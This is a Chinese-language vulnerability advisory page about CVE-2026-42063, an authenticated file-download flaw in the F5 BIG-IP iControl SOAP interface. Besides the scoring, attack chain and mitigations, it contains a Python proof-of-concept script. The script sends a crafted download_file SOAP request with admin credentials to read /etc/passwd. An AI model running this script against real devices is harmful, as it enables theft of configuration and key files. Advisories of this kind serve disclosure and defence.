CVE-2026-42063 CVSS 4.9 中危

CVE-2026-42063: F5 iControl SOAP 敏感文件下载漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42063

漏洞类型

敏感信息泄露

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

F5 BIG-IP iControl SOAP组件存在安全漏洞，拥有Resource Administrator或Administrator角色的经过身份验证的攻击者，可利用该漏洞下载服务器上的敏感文件。该漏洞可能导致关键配置数据泄露，对系统机密性造成严重影响。

技术细节

该漏洞是由于F5 BIG-IP的iControl SOAP接口在处理特定文件请求时，权限验证逻辑存在缺陷导致的。虽然攻击者需要具备高级别权限（PR:H），但一旦通过认证，即可利用接口中用于备份或配置管理的功能，通过构造恶意的SOAP请求，绕过目录限制，读取系统路径下的敏感文件（如配置文件、密钥文件等）。由于利用无需用户交互（UI:N）且攻击复杂度低（AC:L），内部拥有高权限的恶意用户或失陷账号可轻易发起攻击，造成高机密性影响（C:H）。

攻击链分析

STEP 1

侦察

攻击者识别目标为F5 BIG-IP设备，并确认iControl SOAP服务（通常为TCP 443或80端口）已开启。

STEP 2

认证

攻击者使用获取到的Resource Administrator或Administrator高权限账号凭证登录系统。

STEP 3

漏洞利用

攻击者构造恶意的SOAP请求，调用System.ConfigSync.download_file或其他相关接口，指定目标敏感文件路径。

STEP 4

数据泄露

服务器响应请求，返回敏感文件内容（如配置文件、私钥等），攻击者保存数据并进行后续利用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2026-42063 PoC: F5 BIG-IP iControl SOAP Sensitive File Download
# Author: Security Analyst
# Description: Exploits the vulnerability to download sensitive files via iControl SOAP.

import requests
import sys

# Configuration
target_host = "https://<TARGET_IP>"
username = "<ADMIN_USER>"
password = "<ADMIN_PASS>"
file_path = "/etc/passwd"  # Sensitive file to download

# iControl SOAP Endpoint
url = f"{target_host}/iControl/iControlPortal.cgi"

# SOAP Payload for System.ConfigSync.download_file
headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": "urn:iControl:System/ConfigSync"
}

soap_body = f"""<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:iControl:System/ConfigSync">
  <SOAP-ENV:Body>
    <ns1:download_file>
      <ns1:file_name>{file_path}</ns1:file_name>
      <ns1:recursive>false</ns1:recursive>
    </ns1:download_file>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

try:
    print(f"[*] Attempting to connect to {target_host}...")
    response = requests.post(url, data=soap_body, headers=headers, auth=(username, password), verify=False, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Failed to exploit. Status Code: {response.status_code}")
        print(response.text)

except requests.exceptions.RequestException as e:
    print(f"[-] Connection error: {e}")

影响范围

BIG-IP 15.1.x

BIG-IP 14.1.x

BIG-IP 13.1.x

BIG-IP 12.1.x

BIG-IP 11.6.x

防御指南

临时缓解措施

如果无法立即升级，建议通过管理界面临时禁用iControl SOAP服务，或者仅允许受信任的管理网络访问该接口。同时，强制启用多因素认证（MFA）以增加账号被窃取的难度。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-42063
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-42063
3 Details https://www.cvedetails.com/cve/CVE-2026-42063/
4 VulDB https://vuldb.com/cve/CVE-2026-42063
5 Link https://my.f5.com/manage/s/article/K000160973

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表